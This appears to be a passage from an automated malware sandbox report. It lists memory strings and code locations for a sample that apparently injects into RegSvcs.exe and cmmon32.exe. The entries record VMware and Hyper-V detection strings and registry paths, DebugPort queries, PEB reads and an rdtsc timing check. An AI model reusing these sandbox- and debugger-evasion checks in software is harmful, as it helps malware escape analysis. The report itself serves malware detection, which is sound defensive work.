Source: explorer.exe, 00000002.00000000.363174585.00000000083E9000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00
Source: 9JzK89dRiaBYTuN.exe, 00000000.00000002.341797161.0000000002541000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: 9JzK89dRiaBYTuN.exe, 00000000.00000002.341797161.0000000002541000.00000004.00000001.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000002.00000000.356977430.00000000062E0000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: cmmon32.exe, 00000005.00000002.605137350.0000000002E50000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW
Source: 9JzK89dRiaBYTuN.exe, 00000000.00000002.341797161.0000000002541000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: explorer.exe, 00000002.00000000.361509902.00000000082E2000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: 9JzK89dRiaBYTuN.exe, 00000000.00000002.341797161.0000000002541000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000002.00000000.355412077.0000000005D50000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000002.00000000.355412077.0000000005D50000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: 9JzK89dRiaBYTuN.exe, 00000000.00000002.341797161.0000000002541000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: 9JzK89dRiaBYTuN.exe, 00000000.00000002.341797161.0000000002541000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: 9JzK89dRiaBYTuN.exe, 00000000.00000002.341797161.0000000002541000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: explorer.exe, 00000002.00000000.361509902.00000000082E2000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000002.00000000.363289775.0000000008430000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
Source: explorer.exe, 00000002.00000000.355412077.0000000005D50000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: explorer.exe, 00000002.00000000.346086899.000000000095C000.00000004.00000020.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G

Source: C:\Users\user\Desktop\9JzK89dRiaBYTuN.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 1_2_004088B0 rdtsc

1_2_004088B0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 1_2_00409B20 LdrLoadDll,

1_2_00409B20

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A669A6 mov eax, dword ptr fs:[00000030h]	1_2_01A669A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A161A0 mov eax, dword ptr fs:[00000030h]	1_2_01A161A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A161A0 mov eax, dword ptr fs:[00000030h]	1_2_01A161A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A651BE mov eax, dword ptr fs:[00000030h]	1_2_01A651BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A651BE mov eax, dword ptr fs:[00000030h]	1_2_01A651BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A651BE mov eax, dword ptr fs:[00000030h]	1_2_01A651BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A651BE mov eax, dword ptr fs:[00000030h]	1_2_01A651BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A0C182 mov eax, dword ptr fs:[00000030h]	1_2_01A0C182
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A1A185 mov eax, dword ptr fs:[00000030h]	1_2_01A1A185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A12990 mov eax, dword ptr fs:[00000030h]	1_2_01A12990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A741E8 mov eax, dword ptr fs:[00000030h]	1_2_01A741E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019EB1E1 mov eax, dword ptr fs:[00000030h]	1_2_019EB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019EB1E1 mov eax, dword ptr fs:[00000030h]	1_2_019EB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019EB1E1 mov eax, dword ptr fs:[00000030h]	1_2_019EB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A04120 mov eax, dword ptr fs:[00000030h]	1_2_01A04120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A04120 mov eax, dword ptr fs:[00000030h]	1_2_01A04120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A04120 mov eax, dword ptr fs:[00000030h]	1_2_01A04120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A04120 mov eax, dword ptr fs:[00000030h]	1_2_01A04120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A04120 mov ecx, dword ptr fs:[00000030h]	1_2_01A04120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A1513A mov eax, dword ptr fs:[00000030h]	1_2_01A1513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A1513A mov eax, dword ptr fs:[00000030h]	1_2_01A1513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019E9100 mov eax, dword ptr fs:[00000030h]	1_2_019E9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019E9100 mov eax, dword ptr fs:[00000030h]	1_2_019E9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019E9100 mov eax, dword ptr fs:[00000030h]	1_2_019E9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A0B944 mov eax, dword ptr fs:[00000030h]	1_2_01A0B944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A0B944 mov eax, dword ptr fs:[00000030h]	1_2_01A0B944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019EB171 mov eax, dword ptr fs:[00000030h]	1_2_019EB171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019EB171 mov eax, dword ptr fs:[00000030h]	1_2_019EB171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019EC962 mov eax, dword ptr fs:[00000030h]	1_2_019EC962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A120A0 mov eax, dword ptr fs:[00000030h]	1_2_01A120A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A120A0 mov eax, dword ptr fs:[00000030h]	1_2_01A120A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A120A0 mov eax, dword ptr fs:[00000030h]	1_2_01A120A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A120A0 mov eax, dword ptr fs:[00000030h]	1_2_01A120A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A120A0 mov eax, dword ptr fs:[00000030h]	1_2_01A120A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A120A0 mov eax, dword ptr fs:[00000030h]	1_2_01A120A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A290AF mov eax, dword ptr fs:[00000030h]	1_2_01A290AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019E9080 mov eax, dword ptr fs:[00000030h]	1_2_019E9080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A1F0BF mov ecx, dword ptr fs:[00000030h]	1_2_01A1F0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A1F0BF mov eax, dword ptr fs:[00000030h]	1_2_01A1F0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A1F0BF mov eax, dword ptr fs:[00000030h]	1_2_01A1F0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A63884 mov eax, dword ptr fs:[00000030h]	1_2_01A63884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A63884 mov eax, dword ptr fs:[00000030h]	1_2_01A63884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019E58EC mov eax, dword ptr fs:[00000030h]	1_2_019E58EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A7B8D0 mov eax, dword ptr fs:[00000030h]	1_2_01A7B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A7B8D0 mov ecx, dword ptr fs:[00000030h]	1_2_01A7B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A7B8D0 mov eax, dword ptr fs:[00000030h]	1_2_01A7B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A7B8D0 mov eax, dword ptr fs:[00000030h]	1_2_01A7B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A7B8D0 mov eax, dword ptr fs:[00000030h]	1_2_01A7B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A7B8D0 mov eax, dword ptr fs:[00000030h]	1_2_01A7B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A1002D mov eax, dword ptr fs:[00000030h]	1_2_01A1002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A1002D mov eax, dword ptr fs:[00000030h]	1_2_01A1002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A1002D mov eax, dword ptr fs:[00000030h]	1_2_01A1002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A1002D mov eax, dword ptr fs:[00000030h]	1_2_01A1002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A1002D mov eax, dword ptr fs:[00000030h]	1_2_01A1002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A67016 mov eax, dword ptr fs:[00000030h]	1_2_01A67016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A67016 mov eax, dword ptr fs:[00000030h]	1_2_01A67016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A67016 mov eax, dword ptr fs:[00000030h]	1_2_01A67016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019FB02A mov eax, dword ptr fs:[00000030h]	1_2_019FB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019FB02A mov eax, dword ptr fs:[00000030h]	1_2_019FB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019FB02A mov eax, dword ptr fs:[00000030h]	1_2_019FB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019FB02A mov eax, dword ptr fs:[00000030h]	1_2_019FB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01AB4015 mov eax, dword ptr fs:[00000030h]	1_2_01AB4015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01AB4015 mov eax, dword ptr fs:[00000030h]	1_2_01AB4015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01AA2073 mov eax, dword ptr fs:[00000030h]	1_2_01AA2073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01AB1074 mov eax, dword ptr fs:[00000030h]	1_2_01AB1074
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A00050 mov eax, dword ptr fs:[00000030h]	1_2_01A00050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A00050 mov eax, dword ptr fs:[00000030h]	1_2_01A00050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A14BAD mov eax, dword ptr fs:[00000030h]	1_2_01A14BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A14BAD mov eax, dword ptr fs:[00000030h]	1_2_01A14BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A14BAD mov eax, dword ptr fs:[00000030h]	1_2_01A14BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01AB5BA5 mov eax, dword ptr fs:[00000030h]	1_2_01AB5BA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019F1B8F mov eax, dword ptr fs:[00000030h]	1_2_019F1B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019F1B8F mov eax, dword ptr fs:[00000030h]	1_2_019F1B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01AA138A mov eax, dword ptr fs:[00000030h]	1_2_01AA138A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A9D380 mov ecx, dword ptr fs:[00000030h]	1_2_01A9D380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A1B390 mov eax, dword ptr fs:[00000030h]	1_2_01A1B390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A12397 mov eax, dword ptr fs:[00000030h]	1_2_01A12397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A103E2 mov eax, dword ptr fs:[00000030h]	1_2_01A103E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A103E2 mov eax, dword ptr fs:[00000030h]	1_2_01A103E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A103E2 mov eax, dword ptr fs:[00000030h]	1_2_01A103E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A103E2 mov eax, dword ptr fs:[00000030h]	1_2_01A103E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A103E2 mov eax, dword ptr fs:[00000030h]	1_2_01A103E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A103E2 mov eax, dword ptr fs:[00000030h]	1_2_01A103E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A653CA mov eax, dword ptr fs:[00000030h]	1_2_01A653CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A653CA mov eax, dword ptr fs:[00000030h]	1_2_01A653CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01AA131B mov eax, dword ptr fs:[00000030h]	1_2_01AA131B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019EF358 mov eax, dword ptr fs:[00000030h]	1_2_019EF358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A13B7A mov eax, dword ptr fs:[00000030h]	1_2_01A13B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A13B7A mov eax, dword ptr fs:[00000030h]	1_2_01A13B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019EDB40 mov eax, dword ptr fs:[00000030h]	1_2_019EDB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01AB8B58 mov eax, dword ptr fs:[00000030h]	1_2_01AB8B58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019EDB60 mov ecx, dword ptr fs:[00000030h]	1_2_019EDB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A1FAB0 mov eax, dword ptr fs:[00000030h]	1_2_01A1FAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019FAAB0 mov eax, dword ptr fs:[00000030h]	1_2_019FAAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019FAAB0 mov eax, dword ptr fs:[00000030h]	1_2_019FAAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A1D294 mov eax, dword ptr fs:[00000030h]	1_2_01A1D294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A1D294 mov eax, dword ptr fs:[00000030h]	1_2_01A1D294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019E52A5 mov eax, dword ptr fs:[00000030h]	1_2_019E52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019E52A5 mov eax, dword ptr fs:[00000030h]	1_2_019E52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019E52A5 mov eax, dword ptr fs:[00000030h]	1_2_019E52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019E52A5 mov eax, dword ptr fs:[00000030h]	1_2_019E52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019E52A5 mov eax, dword ptr fs:[00000030h]	1_2_019E52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A12AE4 mov eax, dword ptr fs:[00000030h]	1_2_01A12AE4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A12ACB mov eax, dword ptr fs:[00000030h]	1_2_01A12ACB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019EAA16 mov eax, dword ptr fs:[00000030h]	1_2_019EAA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019EAA16 mov eax, dword ptr fs:[00000030h]	1_2_019EAA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A24A2C mov eax, dword ptr fs:[00000030h]	1_2_01A24A2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A24A2C mov eax, dword ptr fs:[00000030h]	1_2_01A24A2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019F8A0A mov eax, dword ptr fs:[00000030h]	1_2_019F8A0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A03A1C mov eax, dword ptr fs:[00000030h]	1_2_01A03A1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A9B260 mov eax, dword ptr fs:[00000030h]	1_2_01A9B260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A9B260 mov eax, dword ptr fs:[00000030h]	1_2_01A9B260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01AB8A62 mov eax, dword ptr fs:[00000030h]	1_2_01AB8A62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A2927A mov eax, dword ptr fs:[00000030h]	1_2_01A2927A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019E9240 mov eax, dword ptr fs:[00000030h]	1_2_019E9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019E9240 mov eax, dword ptr fs:[00000030h]	1_2_019E9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019E9240 mov eax, dword ptr fs:[00000030h]	1_2_019E9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019E9240 mov eax, dword ptr fs:[00000030h]	1_2_019E9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A74257 mov eax, dword ptr fs:[00000030h]	1_2_01A74257
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A135A1 mov eax, dword ptr fs:[00000030h]	1_2_01A135A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019E2D8A mov eax, dword ptr fs:[00000030h]	1_2_019E2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019E2D8A mov eax, dword ptr fs:[00000030h]	1_2_019E2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019E2D8A mov eax, dword ptr fs:[00000030h]	1_2_019E2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019E2D8A mov eax, dword ptr fs:[00000030h]	1_2_019E2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019E2D8A mov eax, dword ptr fs:[00000030h]	1_2_019E2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A11DB5 mov eax, dword ptr fs:[00000030h]	1_2_01A11DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A11DB5 mov eax, dword ptr fs:[00000030h]	1_2_01A11DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A11DB5 mov eax, dword ptr fs:[00000030h]	1_2_01A11DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A12581 mov eax, dword ptr fs:[00000030h]	1_2_01A12581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A12581 mov eax, dword ptr fs:[00000030h]	1_2_01A12581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A12581 mov eax, dword ptr fs:[00000030h]	1_2_01A12581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A12581 mov eax, dword ptr fs:[00000030h]	1_2_01A12581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A1FD9B mov eax, dword ptr fs:[00000030h]	1_2_01A1FD9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A1FD9B mov eax, dword ptr fs:[00000030h]	1_2_01A1FD9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A98DF1 mov eax, dword ptr fs:[00000030h]	1_2_01A98DF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019FD5E0 mov eax, dword ptr fs:[00000030h]	1_2_019FD5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019FD5E0 mov eax, dword ptr fs:[00000030h]	1_2_019FD5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A6A537 mov eax, dword ptr fs:[00000030h]	1_2_01A6A537
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A14D3B mov eax, dword ptr fs:[00000030h]	1_2_01A14D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A14D3B mov eax, dword ptr fs:[00000030h]	1_2_01A14D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01A14D3B mov eax, dword ptr fs:[00000030h]	1_2_01A14D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_01AB8D34 mov eax, dword ptr fs:[00000030h]	1_2_01AB8D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019F3D34 mov eax, dword ptr fs:[00000030h]	1_2_019F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019F3D34 mov eax, dword ptr fs:[00000030h]	1_2_019F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019F3D34 mov eax, dword ptr fs:[00000030h]	1_2_019F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019F3D34 mov eax, dword ptr fs:[00000030h]	1_2_019F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019F3D34 mov eax, dword ptr fs:[00000030h]	1_2_019F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019F3D34 mov eax, dword ptr fs:[00000030h]	1_2_019F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019F3D34 mov eax, dword ptr fs:[00000030h]	1_2_019F3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_019F3D34 mov eax, dword ptr fs:[00000030h]	1_2_019F3D34
